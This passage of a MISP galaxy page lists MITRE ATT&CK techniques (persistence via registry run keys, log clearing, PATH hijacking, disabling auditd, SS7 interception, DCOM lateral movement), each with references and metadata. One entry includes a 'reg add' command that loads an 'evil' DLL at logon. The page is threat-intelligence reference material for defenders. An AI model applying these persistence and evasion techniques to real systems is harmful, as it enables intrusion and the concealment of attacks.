- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1547.001 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Clear Linux or Mac System Logs - T1070.002
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
/var/log/messages:
: General and system-related messages/var/log/secure
or/var/log/auth.log
: Authentication logs/var/log/utmp
or/var/log/wtmp
: Login records/var/log/kern.log
: Kernel logs/var/log/cron.log
: Crond logs/var/log/maillog
: Mail server logs/var/log/httpd/
: Web server access and error logs
Internal MISP references
UUID 2bce5b30-7014-4a5d-ade7-12913fe6ac36
which can be used as unique global reference for Clear Linux or Mac System Logs - T1070.002
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1070.002 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Deletion', 'File: File Modification'] |
mitre_platforms | ['Linux', 'macOS'] |
Related clusters
To see the related clusters, click here.
Clear Network Connection History and Configurations - T1070.007
Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
Windows may also store information about recent RDP connections in files such as C:\Users\%username%\Documents\Default.rdp
and C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\
.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in /Library/Logs
and/or /var/log/
).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to third-party applications or network configuration settings, such as Disable or Modify System Firewall or tampering to enable Proxy. Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.
Internal MISP references
UUID 3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc
which can be used as unique global reference for Clear Network Connection History and Configurations - T1070.007
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1070/007 - webarchive
- https://discussions.apple.com/thread/3991574 - webarchive
- https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer - webarchive
- https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins - webarchive
- https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html - webarchive
- https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1070.007 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Modification', 'Firewall: Firewall Rule Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Network'] |
Related clusters
To see the related clusters, click here.
Compromise Software Dependencies and Development Tools - T1195.001
Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.
Internal MISP references
UUID 191cc6af-1bb2-4344-ab5f-28e496638720
which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1195.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1195.001 |
kill_chain | ['attack-Linux:initial-access', 'attack-macOS:initial-access', 'attack-Windows:initial-access'] |
mitre_data_sources | ['File: File Metadata'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Windows File and Directory Permissions Modification - T1222.001
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as icacls
, cacls
, takeown
, and attrib
, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.
Internal MISP references
UUID 34e793de-0274-4982-9c1a-246ed1c19dee
which can be used as unique global reference for Windows File and Directory Permissions Modification - T1222.001
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1222/001 - webarchive
- https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists - webarchive
- https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces - webarchive
- https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ - webarchive
- https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - webarchive
- https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1222.001 |
kill_chain | ['attack-Windows:defense-evasion'] |
mitre_data_sources | ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Compromise Software Dependencies and Development Tools - T1474.001
Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)
Internal MISP references
UUID 7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3
which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1474.001
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1474/001 - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html - webarchive
- https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1474.001 |
kill_chain | ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Path Interception by PATH Environment Variable - T1574.007
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.
Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.
For example, on Windows if an adversary places a malicious program named "net.exe" in C:\example path
, which by default precedes C:\Windows\system32\net.exe
in the PATH environment variable, when "net" is executed from the command-line the C:\example path
will be called instead of the system's legitimate executable at C:\Windows\system32\net.exe
. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a Command and Scripting Interpreter.(Citation: ExpressVPN PATH env Windows 2021)
Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the $PATH
variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, Unix Shell Configuration Modification, or modifying the /etc/paths.d
folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)
Internal MISP references
UUID 0c2d00da-7742-49e7-9928-4514e5075d32
which can be used as unique global reference for Path Interception by PATH Environment Variable - T1574.007
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1574/007 - webarchive
- https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/ - webarchive
- https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html - webarchive
- https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/ - webarchive
- https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.007 |
kill_chain | ['attack-Windows:persistence', 'attack-macOS:persistence', 'attack-Linux:persistence', 'attack-Windows:privilege-escalation', 'attack-macOS:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Linux:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows', 'macOS', 'Linux'] |
Related clusters
To see the related clusters, click here.
Path Interception by Search Order Hijacking - T1574.008
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL Search Order Hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument net user
. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user
will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.
Internal MISP references
UUID 58af3705-8740-4c68-9329-ec015a7013c2
which can be used as unique global reference for Path Interception by Search Order Hijacking - T1574.008
in MISP communities and other software using the MISP galaxy
External references
- http://msdn.microsoft.com/en-us/library/ms682425 - webarchive
- http://msdn.microsoft.com/en-us/library/ms687393 - webarchive
- https://attack.mitre.org/techniques/T1574/008 - webarchive
- https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 - webarchive
- https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.008 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'File: File Modification', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Disable or Modify Linux Audit System - T1562.012
Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
Often referred to as auditd
, this is the name of the daemon used to write events to disk and is governed by the parameters set in the audit.conf
configuration file. Two primary ways to configure the log generation rules are through the command line auditctl
utility and the file /etc/audit/audit.rules
, containing a sequence of auditctl
commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with auditd
daemon or use systemctl
to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the /etc/audit/audit.rules
or audit.conf
files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
Internal MISP references
UUID 562e9b64-7239-493d-80f4-2bff900d9054
which can be used as unique global reference for Disable or Modify Linux Audit System - T1562.012
in MISP communities and other software using the MISP galaxy
External references
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - webarchive
- https://attack.mitre.org/techniques/T1562/012 - webarchive
- https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505 - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/ - webarchive
- https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.012 |
kill_chain | ['attack-Linux:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Deletion', 'File: File Modification', 'Process: OS API Execution', 'Process: Process Modification'] |
mitre_platforms | ['Linux'] |
Related clusters
To see the related clusters, click here.
Registry Run Keys / Startup Folder - T1060
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.
The startup folder path for the current user is:
* C:\Users[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
The startup folder path for all users is:
* C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"
(Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
Internal MISP references
UUID 9422fc14-1c43-410d-ab0f-a709b76c72dc
which can be used as unique global reference for Registry Run Keys / Startup Folder - T1060
in MISP communities and other software using the MISP galaxy
External references
- http://msdn.microsoft.com/en-us/library/aa376977 - webarchive
- https://attack.mitre.org/techniques/T1060 - webarchive
- https://capec.mitre.org/data/definitions/270.html - webarchive
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - webarchive
- https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key - webarchive
- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1060 |
kill_chain | ['attack-Windows:persistence'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Exploit SS7 to Redirect Phone Calls/SMS - T1449
An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).
Internal MISP references
UUID fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d
which can be used as unique global reference for Exploit SS7 to Redirect Phone Calls/SMS - T1449
in MISP communities and other software using the MISP galaxy
External references
- http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf - webarchive
- https://attack.mitre.org/techniques/T1449 - webarchive
- https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html - webarchive
- https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf - webarchive
- https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf - webarchive
- https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/ - webarchive
- https://www.youtube.com/watch?v=q0n5ySqbfdI - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1449 |
kill_chain | ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects'] |
mitre_platforms | ['Android', 'iOS'] |
Assess security posture of physical locations - T1302
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)
Internal MISP references
UUID 31a57c70-6709-4d06-a473-c3df1f74c1d4
which can be used as unique global reference for Assess security posture of physical locations - T1302
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1302 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Determine domain and IP address space - T1250
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)
Internal MISP references
UUID 23ecb7e0-0340-43d9-80a5-8971fe866ddf
which can be used as unique global reference for Determine domain and IP address space - T1250
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1250 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Research visibility gap of security vendors - T1290
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)
Internal MISP references
UUID b26babc7-9127-4bd5-9750-5e49748c9be3
which can be used as unique global reference for Research visibility gap of security vendors - T1290
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1290 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Exploit SS7 to Track Device Location - T1450
An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)
Internal MISP references
UUID 52651225-0b3a-482d-aa7e-10618fd063b5
which can be used as unique global reference for Exploit SS7 to Track Device Location - T1450
in MISP communities and other software using the MISP galaxy
External references
- http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf - webarchive
- https://attack.mitre.org/techniques/T1450 - webarchive
- https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html - webarchive
- https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf - webarchive
- https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf - webarchive
- https://www.youtube.com/watch?v=q0n5ySqbfdI - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1450 |
kill_chain | ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Access Sensitive Data in Device Logs - T1413
On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.
Internal MISP references
UUID 29e07491-8947-43a3-8d4e-9a787c45f3d3
which can be used as unique global reference for Access Sensitive Data in Device Logs - T1413
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1413 |
kill_chain | ['mobile-attack-Android:collection', 'mobile-attack-Android:credential-access'] |
mitre_platforms | ['Android'] |
Stolen Developer Credentials or Signing Keys - T1441
An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer's identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).
Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer's identity.
Platforms: Android, iOS
Internal MISP references
UUID a21a6a79-f9a1-4c87-aed9-ba2d79536881
which can be used as unique global reference for Stolen Developer Credentials or Signing Keys - T1441
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1441 |
Related clusters
To see the related clusters, click here.
Component Object Model and Distributed COM - T1175
This technique has been deprecated. Please use Distributed Component Object Model and Component Object Model.
Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement.
COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
Internal MISP references
UUID 772bc7a8-a157-42cc-8728-d648e25c7fe7
which can be used as unique global reference for Component Object Model and Distributed COM - T1175
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1175 - webarchive
- https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1 - webarchive
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ - webarchive
- https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ - webarchive
- https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ - webarchive
- https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/ - webarchive
- https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html - webarchive
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx - webarchive
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx - webarchive
- https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx - webarchive
- https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom - webarchive
- https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1175 |
kill_chain | ['attack-Windows:lateral-movement', 'attack-Windows:execution'] |
mitre_platforms | ['Windows'] |
Develop social network persona digital footprint - T1342
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)
Internal MISP references
UUID 271e6d40-e191-421a-8f87-a8102452c201
which can be used as unique global reference for Develop social network persona digital footprint - T1342
in MISP communities and other software using the MISP galaxy
External references
- http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf - webarchive
- https://attack.mitre.org/techniques/T1342 - webarchive
- https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1342 |
kill_chain | ['pre-attack:persona-development'] |
Assess vulnerability of 3rd party vendors - T1298
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)
Internal MISP references
UUID 1def484d-2343-470d-8925-88f45b5f9615
which can be used as unique global reference for Assess vulnerability of 3rd party vendors - T1298
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1298 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Manipulate App Store Rankings or Ratings - T1452
